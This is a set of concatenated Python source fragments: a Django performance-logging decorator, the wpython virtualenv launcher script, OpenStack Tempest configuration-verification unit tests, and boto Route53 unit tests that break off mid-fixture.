    log_level / sampling unless force is True.
    """
    def performance_log_decorator(f):
        @wraps(f)
        def wrapped_f(*args, **kwargs):
            # NOTE(review): start_time is stored on the function object, so
            # concurrent calls to the same function overwrite each other —
            # confirm this is acceptable for the call sites.
            f.start_time = timezone.now()
            watchdog = None
            if force or (log_level > SETTINGS.get('LOG_LEVEL', 1)):
                interval = slow_time if slow_time else SETTINGS.get('MIDDLEWARE_SLOW', 25000) / 1000.0
                # The handle was previously bound to a local named `dogslow`
                # (shadowing the imported module) and never cancelled, so
                # peek() fired even for calls that finished quickly.
                watchdog = performance_log.timer.run_later(
                    DiagnosticMiddleware.peek,
                    interval,
                    f,
                    thread.get_ident(),
                    datetime.datetime.utcnow(),
                    f.__module__,
                    f.__name__,)
            try:
                ret_val = f(*args, **kwargs)
            finally:
                # Cancel the pending snapshot once the call has returned
                # (or raised) before the slow threshold.
                if watchdog is not None:
                    performance_log.timer.cancel(watchdog)
            do_log = force
            if not do_log:
                do_log = ((log_level >= SETTINGS.get('LOG_LEVEL', 1.0)) and
                          random.random() <= SETTINGS.get('SAMPLE_RATE', 1.0))
            if do_log:
                elapsed_timedelta = timezone.now() - f.start_time
                log_diagnostic(
                    event=f.__module__,
                    sub_event=f.__name__,
                    elapsed_timedelta=elapsed_timedelta,
                    log_level=log_level,
                    force=True,
                )
            return ret_val
        return wrapped_f
    return performance_log_decorator
# Shared watchdog timer used by the decorator above.
performance_log.timer = dogslow.timer.Timer()
performance_log.timer.daemon = True
performance_log.timer.start()
| |
#!/usr/bin/env python
# encoding: utf-8
"""
wpython.py
==========
__ __
.--.--.--.-----.--.--| |_| |--.-----.-----.
| | | | _ | | | _| | _ | |
|________| __|___ |____|__|__|_____|__|__|
|__| |_____|
With wpython you can launch scripts residing in virtual environments
without the need of activating the venv.
When you want to execute a script in a venv, what do you usually do?
Activate the venv, execute the script, deactivate the venv. But what if
you want to call a venv'ed script in batch mode from another script?
Each venv has its own Python interpreter. When you execute a script in the
venv, this Python interpreter is used to run the script. If you don't
want to activate the venv, then you need to provide the path of this
Python interpreter. Example:
/path/to/venv/bin/python /path/to/script.py
wpython reduces it to:
wpython /path/to/script.py
wpython figures out the path of the Python interpreter in the venv
and passes /path/to/script.py to this local interpreter.
Requirements
------------
wpython relies on the excellent unipath library, which provides a sane
way to work with files and directories.
It comes bundled with wpython or you can install it system-wide.
Tested with
-----------
It was tested under Linux with Python 2 and Python 3.
Usage
-----
1) Put wpython.py somewhere in your PATH.
Tip: I put two symbolic links on it: wpython and wpy.
2) In the root of your venv'ed project directory create a file called ".venv".
The content of this file should be the path of the directory
where the virtual env. is created by the commands virtualenv or
virtualenvwrapper.
This path can be either absolute or relative.
You can also rename ".venv", see the VENV_FILE constant in the source below.
virtualenvwrapper example
-------------------------
Say we have our project directory here: `/home/jabba/python/wpython_demo`.
In this folder launch this command:
mkvirtualenv wpython_demo
It creates the virtual environment here: `/home/jabba/.virtualenvs/wpython_demo.`
Then create the file `/home/jabba/python/wpython_demo/.venv` with this content:
/home/jabba/.virtualenvs/wpython_demo
Say you have a `demo.py` file in this wpython_demo project. Launch it like this:
$ cd /home/jabba/python/wpython_demo
$ wpython demo.py
Notice that we didn't have to activate the virtual environment.
virtualenv example
------------------
Say you put your virtual environment in the root of the project folder
under a subdirectory called "venv". In this case the content of the ".venv"
file can be a relative path:
$ cat .venv
venv
You launch a script the same way as explained for virtualenvwrapper.
Extra feature
-------------
With wpython you can also launch scripts that are not in the project's
root folder but deep in a subfolder. You still need just one ".venv" file
in the project's root. If wpython doesn't find the file `.venv` in the folder
of the script to be launched, it will start stepping back to the parent
folders. It will use the first `.venv` file it finds.
Author:
-------
Laszlo Szathmary, alias Jabba Laci, 2014 (jabba.laci@gmail.com)
https://github.com/jabbalaci
ASCII logo made with http://patorjk.com/software/taag
"""
from __future__ import (absolute_import, division,
print_function, unicode_literals)
import shlex
import sys
from subprocess import call
from unipath import Path
VENV_FILE = '.venv' # rename it if you want
DEBUG = True # you can also switch debug mode off with the -s option
def my_call(python_path, prg, args):
    """
    Run *prg* with the venv's Python interpreter, forwarding *args*.

    The command is passed to subprocess.call as an argument list (no shell
    string is built), so script paths and arguments containing spaces or
    quotes are forwarded untouched.  Previously the command was rendered to
    one string and re-tokenized with shlex.split, which mangled such values.

    Returns the child process's exit status.
    """
    cmd = [str(python_path), str(prg)] + [str(a) for a in args]
    return call(cmd)
def find_venv_file(folder):
    """
    Locate the venv marker file, walking up parent folders as needed.

    Returns the Path of the first marker found; prints an error and exits
    when the filesystem root is reached without finding one.
    """
    candidate = Path(folder, VENV_FILE)
    while not candidate.isfile():
        if folder == "/":
            break
        folder = folder.parent
        candidate = Path(folder, VENV_FILE)
    if candidate.isfile():
        if DEBUG:
            print("# venv file: {f}".format(f=candidate), file=sys.stderr)
        return candidate
    # No marker anywhere up to the root: give up.
    print("Error: {f} file is missing.".format(f=VENV_FILE), file=sys.stderr)
    sys.exit(1)
def print_usage(help=False):
    """Print the one-line usage summary; with help=True, also the options."""
    print("Usage: wpython script_in_virtualenvwrapper.py [arg]...")
    if not help:
        return
    print("""
Options:
-h, --help: this help
-s: silent mode (no debug info)
""".strip())
def check_args(args):
    """
    Handle wpython's own options and return the remaining arguments.
    """
    global DEBUG
    first = args[0]
    if first in ("-h", "--help"):
        print_usage(help=True)
        sys.exit(0)
    if first == "-s":
        # silent mode: suppress the debug lines written to stderr
        DEBUG = False
        args = args[1:]
    # Everything known has been handled; what's left must be the script.
    if not args:
        print_usage()
        sys.exit(1)
    if args[0].startswith("-"):
        print("Error: unknown option: {o}".format(o=args[0]), file=sys.stderr)
        sys.exit(1)
    return args
def main():
    """
    Controller: resolve the venv's interpreter and run the script with it.
    """
    cli_args = sys.argv[1:]
    if not cli_args:
        print_usage()
        sys.exit(0)
    cli_args = check_args(cli_args)
    script = cli_args[0]        # script residing in a venv'ed project
    script_args = cli_args[1:]  # arguments forwarded to that script
    script_path = Path(script).absolute()
    venv_file = find_venv_file(script_path.parent)
    venv_dir = Path(venv_file.read_file().strip())
    # The marker may hold a relative path; resolve it against its own folder.
    if not venv_dir.isabsolute():
        venv_dir = Path(venv_file.parent, venv_dir).norm()
    if not venv_dir.isdir():
        print("Error: {vd} is not a directory.".format(vd=venv_dir),
              file=sys.stderr)
        sys.exit(1)
    python_path = Path(venv_dir, "bin/python")
    if not python_path.isfile():
        print("Error: {pp} is missing.".format(pp=python_path),
              file=sys.stderr)
        sys.exit(1)
    if DEBUG:
        print("# venv dir: {d}".format(d=venv_dir), file=sys.stderr)
    my_call(python_path, script, script_args)
##############################################################################
if __name__ == "__main__":
main()
| |
# Copyright 2014 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import fixtures
import mock
from oslo_serialization import jsonutils as json
from tempest.cmd import verify_tempest_config
from tempest import config
from tempest.lib.common.utils import data_utils
from tempest.tests import base
from tempest.tests import fake_config
class TestGetAPIVersions(base.TestCase):
    """Unit tests for the endpoint URL helpers in verify_tempest_config."""

    def test_remove_version_project(self):
        """Version segments and project ids are stripped from URL paths."""
        strip = verify_tempest_config._remove_version_project
        self.assertEqual('/', strip('/v2.1/%s/' % data_utils.rand_uuid_hex()))
        self.assertEqual('', strip('/v2.1/tenant_id'))
        self.assertEqual('', strip('/v3'))
        self.assertEqual('/', strip('/v3/'))
        self.assertEqual('/something/', strip('/something/v2.1/tenant_id/'))
        self.assertEqual('/something', strip('/something/v2.1/tenant_id'))
        self.assertEqual('/something', strip('/something/v3'))
        self.assertEqual('/something/', strip('/something/v3/'))
        self.assertEqual('/', strip('/'))  # http://localhost/
        self.assertEqual('', strip(''))  # http://localhost

    def test_url_grab_versioned_nova_nossl(self):
        """The version suffix is dropped from a plain-http nova URL."""
        result = verify_tempest_config._get_unversioned_endpoint(
            'http://127.0.0.1:8774/v2/')
        self.assertEqual('http://127.0.0.1:8774/', result)

    def test_url_grab_versioned_nova_ssl(self):
        """The version suffix is dropped from an https nova URL."""
        result = verify_tempest_config._get_unversioned_endpoint(
            'https://127.0.0.1:8774/v3/')
        self.assertEqual('https://127.0.0.1:8774/', result)

    def test_get_unversioned_endpoint_base(self):
        """An already-unversioned URL is returned unchanged."""
        result = verify_tempest_config._get_unversioned_endpoint(
            'https://127.0.0.1:5000/')
        self.assertEqual('https://127.0.0.1:5000/', result)

    def test_get_unversioned_endpoint_subpath(self):
        """A version under a subpath is removed while keeping the subpath."""
        result = verify_tempest_config._get_unversioned_endpoint(
            'https://127.0.0.1/identity/v3')
        self.assertEqual('https://127.0.0.1/identity', result)

    def test_get_unversioned_endpoint_subpath_trailing_solidus(self):
        """A trailing slash after the version segment is preserved."""
        result = verify_tempest_config._get_unversioned_endpoint(
            'https://127.0.0.1/identity/v3/')
        self.assertEqual('https://127.0.0.1/identity/', result)
class TestDiscovery(base.TestCase):
    def setUp(self):
        """Swap the real tempest configuration for fakes so the verification
        helpers never read an operator's tempest.conf."""
        super(TestDiscovery, self).setUp()
        self.useFixture(fake_config.ConfigFixture())
        self.patchobject(config, 'TempestConfigPrivate',
                         fake_config.FakePrivate)
def test_get_keystone_api_versions(self):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': {'values': [{'id': 'v2.0'}, {'id': 'v3.0'}]}}
fake_resp = json.dumps(fake_resp)
self.useFixture(fixtures.MockPatch(
'tempest.lib.common.http.ClosingHttp.request',
return_value=(None, fake_resp)))
fake_os = mock.MagicMock()
versions = verify_tempest_config._get_api_versions(fake_os, 'keystone')
self.assertIn('v2.0', versions)
self.assertIn('v3.0', versions)
def test_get_cinder_api_versions(self):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v1.0'}, {'id': 'v2.0'}]}
fake_resp = json.dumps(fake_resp)
self.useFixture(fixtures.MockPatch(
'tempest.lib.common.http.ClosingHttp.request',
return_value=(None, fake_resp)))
fake_os = mock.MagicMock()
versions = verify_tempest_config._get_api_versions(fake_os, 'cinder')
self.assertIn('v1.0', versions)
self.assertIn('v2.0', versions)
def test_get_nova_versions(self):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v2.0'}, {'id': 'v3.0'}]}
fake_resp = json.dumps(fake_resp)
self.useFixture(fixtures.MockPatch(
'tempest.lib.common.http.ClosingHttp.request',
return_value=(None, fake_resp)))
fake_os = mock.MagicMock()
versions = verify_tempest_config._get_api_versions(fake_os, 'nova')
self.assertIn('v2.0', versions)
self.assertIn('v3.0', versions)
    def test_get_versions_invalid_response(self):
        """A non-JSON versions response raises ValueError and logs an error."""
        # When the response doesn't contain a JSON response, an error is
        # logged.
        mock_log_error = self.useFixture(fixtures.MockPatchObject(
            verify_tempest_config.LOG, 'error')).mock
        self.useFixture(fixtures.MockPatchObject(
            verify_tempest_config, '_get_unversioned_endpoint'))
        # Simulated response is not JSON.
        sample_body = (
            '<html><head>Sample Response</head><body>This is the sample page '
            'for the web server. Why are you requesting it?</body></html>')
        self.useFixture(fixtures.MockPatch(
            'tempest.lib.common.http.ClosingHttp.request',
            return_value=(None, sample_body)))
        # service value doesn't matter, just needs to match what
        # _get_api_versions puts in its client_dict.
        self.assertRaises(ValueError, verify_tempest_config._get_api_versions,
                          os=mock.MagicMock(), service='keystone')
        self.assertTrue(mock_log_error.called)
def test_verify_api_versions(self):
api_services = ['cinder', 'glance', 'keystone']
fake_os = mock.MagicMock()
for svc in api_services:
m = 'verify_%s_api_versions' % svc
with mock.patch.object(verify_tempest_config, m) as verify_mock:
verify_tempest_config.verify_api_versions(fake_os, svc, True)
verify_mock.assert_called_once_with(fake_os, True)
def test_verify_api_versions_not_implemented(self):
api_services = ['cinder', 'glance', 'keystone']
fake_os = mock.MagicMock()
for svc in api_services:
m = 'verify_%s_api_versions' % svc
with mock.patch.object(verify_tempest_config, m) as verify_mock:
verify_tempest_config.verify_api_versions(fake_os, 'foo', True)
self.assertFalse(verify_mock.called)
@mock.patch('tempest.lib.common.http.ClosingHttp.request')
def test_verify_keystone_api_versions_no_v3(self, mock_request):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': {'values': [{'id': 'v2.0'}]}}
fake_resp = json.dumps(fake_resp)
mock_request.return_value = (None, fake_resp)
fake_os = mock.MagicMock()
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_keystone_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v3',
'identity-feature-enabled',
False, True)
    @mock.patch('tempest.lib.common.http.ClosingHttp.request')
    def test_verify_keystone_api_versions_no_v2(self, mock_request):
        """A v3-only identity endpoint should switch api_v2 off."""
        self.useFixture(fixtures.MockPatchObject(
            verify_tempest_config, '_get_unversioned_endpoint',
            return_value='http://fake_endpoint:5000'))
        fake_resp = {'versions': {'values': [{'id': 'v3.0'}]}}
        fake_resp = json.dumps(fake_resp)
        mock_request.return_value = (None, fake_resp)
        fake_os = mock.MagicMock()
        with mock.patch.object(verify_tempest_config,
                               'print_and_or_update') as print_mock:
            verify_tempest_config.verify_keystone_api_versions(fake_os, True)
            print_mock.assert_called_once_with('api_v2',
                                               'identity-feature-enabled',
                                               False, True)
@mock.patch('tempest.lib.common.http.ClosingHttp.request')
def test_verify_cinder_api_versions_no_v3(self, mock_request):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v2.0'}]}
fake_resp = json.dumps(fake_resp)
mock_request.return_value = (None, fake_resp)
fake_os = mock.MagicMock()
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_cinder_api_versions(fake_os, True)
print_mock.assert_any_call('api_v3', 'volume-feature-enabled',
False, True)
self.assertEqual(1, print_mock.call_count)
    @mock.patch('tempest.lib.common.http.ClosingHttp.request')
    def test_verify_cinder_api_versions_no_v2(self, mock_request):
        """A volume endpoint without v2 should disable api_v2 only."""
        self.useFixture(fixtures.MockPatchObject(
            verify_tempest_config, '_get_unversioned_endpoint',
            return_value='http://fake_endpoint:5000'))
        fake_resp = {'versions': [{'id': 'v3.0'}]}
        fake_resp = json.dumps(fake_resp)
        mock_request.return_value = (None, fake_resp)
        fake_os = mock.MagicMock()
        with mock.patch.object(verify_tempest_config,
                               'print_and_or_update') as print_mock:
            verify_tempest_config.verify_cinder_api_versions(fake_os, True)
            print_mock.assert_any_call('api_v2', 'volume-feature-enabled',
                                       False, True)
            self.assertEqual(1, print_mock.call_count)
@mock.patch('tempest.lib.common.http.ClosingHttp.request')
def test_verify_cinder_api_versions_no_v1(self, mock_request):
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, '_get_unversioned_endpoint',
return_value='http://fake_endpoint:5000'))
fake_resp = {'versions': [{'id': 'v2.0'}, {'id': 'v3.0'}]}
fake_resp = json.dumps(fake_resp)
mock_request.return_value = (None, fake_resp)
fake_os = mock.MagicMock()
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_cinder_api_versions(fake_os, True)
print_mock.assert_not_called()
def test_verify_glance_version_no_v2_with_v1_1(self):
def fake_get_versions():
return (None, ['v1.1'])
fake_os = mock.MagicMock()
fake_os.image_client.get_versions = fake_get_versions
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_glance_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v2', 'image-feature-enabled',
False, True)
def test_verify_glance_version_no_v2_with_v1_0(self):
def fake_get_versions():
return (None, ['v1.0'])
fake_os = mock.MagicMock()
fake_os.image_client.get_versions = fake_get_versions
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_glance_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v2', 'image-feature-enabled',
False, True)
def test_verify_glance_version_no_v1(self):
def fake_get_versions():
return (None, ['v2.0'])
fake_os = mock.MagicMock()
fake_os.image_client.get_versions = fake_get_versions
with mock.patch.object(verify_tempest_config,
'print_and_or_update') as print_mock:
verify_tempest_config.verify_glance_api_versions(fake_os, True)
print_mock.assert_called_once_with('api_v1', 'image-feature-enabled',
False, True)
def test_verify_extensions_neutron(self):
def fake_list_extensions():
return {'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]}
fake_os = mock.MagicMock()
fake_os.network_extensions_client.list_extensions = (
fake_list_extensions)
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['fake1', 'fake2', 'fake3'])))
results = verify_tempest_config.verify_extensions(fake_os,
'neutron', {})
self.assertIn('neutron', results)
self.assertIn('fake1', results['neutron'])
self.assertTrue(results['neutron']['fake1'])
self.assertIn('fake2', results['neutron'])
self.assertTrue(results['neutron']['fake2'])
self.assertIn('fake3', results['neutron'])
self.assertFalse(results['neutron']['fake3'])
self.assertIn('not_fake', results['neutron'])
self.assertFalse(results['neutron']['not_fake'])
def test_verify_extensions_neutron_all(self):
def fake_list_extensions():
return {'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]}
fake_os = mock.MagicMock()
fake_os.network_extensions_client.list_extensions = (
fake_list_extensions)
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['all'])))
results = verify_tempest_config.verify_extensions(fake_os,
'neutron', {})
self.assertIn('neutron', results)
self.assertIn('extensions', results['neutron'])
self.assertEqual(sorted(['fake1', 'fake2', 'not_fake']),
sorted(results['neutron']['extensions']))
def test_verify_extensions_cinder(self):
def fake_list_extensions():
return {'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]}
fake_os = mock.MagicMock()
# NOTE (e0ne): mock both v1 and v2 APIs
fake_os.volumes_extension_client.list_extensions = fake_list_extensions
fake_os.volumes_v2_extension_client.list_extensions = (
fake_list_extensions)
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['fake1', 'fake2', 'fake3'])))
results = verify_tempest_config.verify_extensions(fake_os,
'cinder', {})
self.assertIn('cinder', results)
self.assertIn('fake1', results['cinder'])
self.assertTrue(results['cinder']['fake1'])
self.assertIn('fake2', results['cinder'])
self.assertTrue(results['cinder']['fake2'])
self.assertIn('fake3', results['cinder'])
self.assertFalse(results['cinder']['fake3'])
self.assertIn('not_fake', results['cinder'])
self.assertFalse(results['cinder']['not_fake'])
def test_verify_extensions_cinder_all(self):
def fake_list_extensions():
return {'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]}
fake_os = mock.MagicMock()
# NOTE (e0ne): mock both v1 and v2 APIs
fake_os.volumes_extension_client.list_extensions = fake_list_extensions
fake_os.volumes_v2_extension_client.list_extensions = (
fake_list_extensions)
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['all'])))
results = verify_tempest_config.verify_extensions(fake_os,
'cinder', {})
self.assertIn('cinder', results)
self.assertIn('extensions', results['cinder'])
self.assertEqual(sorted(['fake1', 'fake2', 'not_fake']),
sorted(results['cinder']['extensions']))
def test_verify_extensions_nova(self):
def fake_list_extensions():
return ([{'alias': 'fake1'}, {'alias': 'fake2'},
{'alias': 'not_fake'}])
fake_os = mock.MagicMock()
fake_os.extensions_client.list_extensions = fake_list_extensions
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['fake1', 'fake2', 'fake3'])))
results = verify_tempest_config.verify_extensions(fake_os,
'nova', {})
self.assertIn('nova', results)
self.assertIn('fake1', results['nova'])
self.assertTrue(results['nova']['fake1'])
self.assertIn('fake2', results['nova'])
self.assertTrue(results['nova']['fake2'])
self.assertIn('fake3', results['nova'])
self.assertFalse(results['nova']['fake3'])
self.assertIn('not_fake', results['nova'])
self.assertFalse(results['nova']['not_fake'])
def test_verify_extensions_nova_all(self):
def fake_list_extensions():
return ({'extensions': [{'alias': 'fake1'},
{'alias': 'fake2'},
{'alias': 'not_fake'}]})
fake_os = mock.MagicMock()
fake_os.extensions_client.list_extensions = fake_list_extensions
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['all'])))
results = verify_tempest_config.verify_extensions(fake_os,
'nova', {})
self.assertIn('nova', results)
self.assertIn('extensions', results['nova'])
self.assertEqual(sorted(['fake1', 'fake2', 'not_fake']),
sorted(results['nova']['extensions']))
def test_verify_extensions_swift(self):
def fake_list_extensions():
return {'fake1': 'metadata',
'fake2': 'metadata',
'not_fake': 'metadata',
'swift': 'metadata'}
fake_os = mock.MagicMock()
fake_os.capabilities_client.list_capabilities = fake_list_extensions
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['fake1', 'fake2', 'fake3'])))
results = verify_tempest_config.verify_extensions(fake_os, 'swift', {})
self.assertIn('swift', results)
self.assertIn('fake1', results['swift'])
self.assertTrue(results['swift']['fake1'])
self.assertIn('fake2', results['swift'])
self.assertTrue(results['swift']['fake2'])
self.assertIn('fake3', results['swift'])
self.assertFalse(results['swift']['fake3'])
self.assertIn('not_fake', results['swift'])
self.assertFalse(results['swift']['not_fake'])
def test_verify_extensions_swift_all(self):
def fake_list_extensions():
return {'fake1': 'metadata',
'fake2': 'metadata',
'not_fake': 'metadata',
'swift': 'metadata'}
fake_os = mock.MagicMock()
fake_os.capabilities_client.list_capabilities = fake_list_extensions
self.useFixture(fixtures.MockPatchObject(
verify_tempest_config, 'get_enabled_extensions',
return_value=(['all'])))
results = verify_tempest_config.verify_extensions(fake_os,
'swift', {})
self.assertIn('swift', results)
self.assertIn('extensions', results['swift'])
self.assertEqual(sorted(['not_fake', 'fake1', 'fake2']),
sorted(results['swift']['extensions']))
| |
#!/usr/bin/env python
# Copyright (c) 2013 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from tests.compat import mock
import re
import xml.dom.minidom
from boto.exception import BotoServerError
from boto.route53.connection import Route53Connection
from boto.route53.exception import DNSServerError
from boto.route53.healthcheck import HealthCheck
from boto.route53.record import ResourceRecordSets, Record
from boto.route53.zone import Zone
from nose.plugins.attrib import attr
from tests.unit import AWSMockServiceTestCase
from boto.compat import six
urllib = six.moves.urllib
@attr(route53=True)
class TestRoute53Connection(AWSMockServiceTestCase):
    """Error and retry behaviour of the base Route53 connection."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestRoute53Connection, self).setUp()
        # Counter bumped by the wrapped retry handler in test_retryable_400.
        self.calls = {'count': 0}
    def default_body(self):
        return b"""<Route53Result>
    <Message>It failed.</Message>
</Route53Result>
"""
    def test_typical_400(self):
        """A non-retryable 400 surfaces as DNSServerError."""
        self.set_http_response(status_code=400,
                               header=[['Code', 'Throttling']])
        with self.assertRaises(DNSServerError) as err:
            self.service_connection.get_all_hosted_zones()
        self.assertTrue('It failed.' in str(err.exception))
    @mock.patch('time.sleep')
    def test_retryable_400(self, sleep_mock):
        """PriorRequestNotComplete is retried until attempts run out."""
        self.set_http_response(status_code=400,
                               header=[['Code', 'PriorRequestNotComplete']])
        def counting(func):
            # Wrap the retry handler so each invocation is counted.
            def _wrapper(*args, **kwargs):
                self.calls['count'] += 1
                return func(*args, **kwargs)
            return _wrapper
        original_handler = self.service_connection._retry_handler
        self.service_connection._retry_handler = counting(original_handler)
        self.assertEqual(self.calls['count'], 0)
        # Retries get exhausted and the error finally propagates.
        with self.assertRaises(BotoServerError):
            self.service_connection.get_all_hosted_zones()
        self.assertEqual(self.calls['count'], 7)
        # Restore the unwrapped handler.
        self.service_connection._retry_handler = original_handler
@attr(route53=True)
class TestCreateZoneRoute53(AWSMockServiceTestCase):
    """Zone creation via create_zone / create_hosted_zone."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestCreateZoneRoute53, self).setUp()
    def default_body(self):
        # Canned CreateHostedZoneResponse returned for every request below.
        return b"""
<CreateHostedZoneResponse xmlns="https://route53.amazonaws.com/doc/2012-02-29/">
    <HostedZone>
        <Id>/hostedzone/Z11111</Id>
        <Name>example.com.</Name>
        <CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee</CallerReference>
        <Config>
            <Comment></Comment>
        </Config>
        <ResourceRecordSetCount>2</ResourceRecordSetCount>
    </HostedZone>
    <ChangeInfo>
        <Id>/change/C1111111111111</Id>
        <Status>PENDING</Status>
        <SubmittedAt>2014-02-02T10:19:29.928Z</SubmittedAt>
    </ChangeInfo>
    <DelegationSet>
        <NameServers>
            <NameServer>ns-100.awsdns-01.com</NameServer>
            <NameServer>ns-1000.awsdns-01.co.uk</NameServer>
            <NameServer>ns-1000.awsdns-01.org</NameServer>
            <NameServer>ns-900.awsdns-01.net</NameServer>
        </NameServers>
    </DelegationSet>
</CreateHostedZoneResponse>
"""
    def test_create_zone(self):
        # create_zone wraps the parsed response in a Zone object.
        self.set_http_response(status_code=201)
        response = self.service_connection.create_zone("example.com.")
        self.assertTrue(isinstance(response, Zone))
        self.assertEqual(response.id, "Z11111")
        self.assertEqual(response.name, "example.com.")
    def test_create_hosted_zone(self):
        # create_hosted_zone returns the raw parsed dict, including the
        # delegation set's name servers.
        self.set_http_response(status_code=201)
        response = self.service_connection.create_hosted_zone("example.com.", "my_ref", "this is a comment")
        self.assertEqual(response['CreateHostedZoneResponse']['DelegationSet']['NameServers'],
                         ['ns-100.awsdns-01.com', 'ns-1000.awsdns-01.co.uk', 'ns-1000.awsdns-01.org', 'ns-900.awsdns-01.net'])
@attr(route53=True)
class TestGetZoneRoute53(AWSMockServiceTestCase):
    """Zone listing and lookup via get_all_hosted_zones / get_zone."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestGetZoneRoute53, self).setUp()
    def default_body(self):
        # Canned ListHostedZonesResponse with three zones.
        return b"""
<ListHostedZonesResponse xmlns="https://route53.amazonaws.com/doc/2012-02-29/">
    <HostedZones>
        <HostedZone>
            <Id>/hostedzone/Z1111</Id>
            <Name>example2.com.</Name>
            <CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee</CallerReference>
            <Config/>
            <ResourceRecordSetCount>3</ResourceRecordSetCount>
        </HostedZone>
        <HostedZone>
            <Id>/hostedzone/Z2222</Id>
            <Name>example1.com.</Name>
            <CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeef</CallerReference>
            <Config/>
            <ResourceRecordSetCount>6</ResourceRecordSetCount>
        </HostedZone>
        <HostedZone>
            <Id>/hostedzone/Z3333</Id>
            <Name>example.com.</Name>
            <CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeeg</CallerReference>
            <Config/>
            <ResourceRecordSetCount>6</ResourceRecordSetCount>
        </HostedZone>
    </HostedZones>
    <IsTruncated>false</IsTruncated>
    <MaxItems>100</MaxItems>
</ListHostedZonesResponse>
"""
    def test_list_zones(self):
        # Every fixture zone must appear exactly once in the listing.
        # (Leftover debug print() calls removed; list.remove() raises
        # ValueError on any unexpected name, which fails the test.)
        self.set_http_response(status_code=201)
        response = self.service_connection.get_all_hosted_zones()
        domains = ['example2.com.', 'example1.com.', 'example.com.']
        for d in response['ListHostedZonesResponse']['HostedZones']:
            domains.remove(d['Name'])
        self.assertEqual(domains, [])
    def test_get_zone(self):
        # get_zone resolves a single name to a Zone object.
        self.set_http_response(status_code=201)
        response = self.service_connection.get_zone('example.com.')
        self.assertTrue(isinstance(response, Zone))
        self.assertEqual(response.name, "example.com.")
@attr(route53=True)
class TestGetHostedZoneRoute53(AWSMockServiceTestCase):
    """Single-zone lookup via get_hosted_zone (raw dict result)."""
    connection_class = Route53Connection
    def setUp(self):
        super(TestGetHostedZoneRoute53, self).setUp()
    def default_body(self):
        # Canned GetHostedZoneResponse for zone Z1111.
        return b"""
<GetHostedZoneResponse xmlns="https://route53.amazonaws.com/doc/2012-02-29/">
    <HostedZone>
        <Id>/hostedzone/Z1111</Id>
        <Name>example.com.</Name>
        <CallerReference>aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee</CallerReference>
        <Config/>
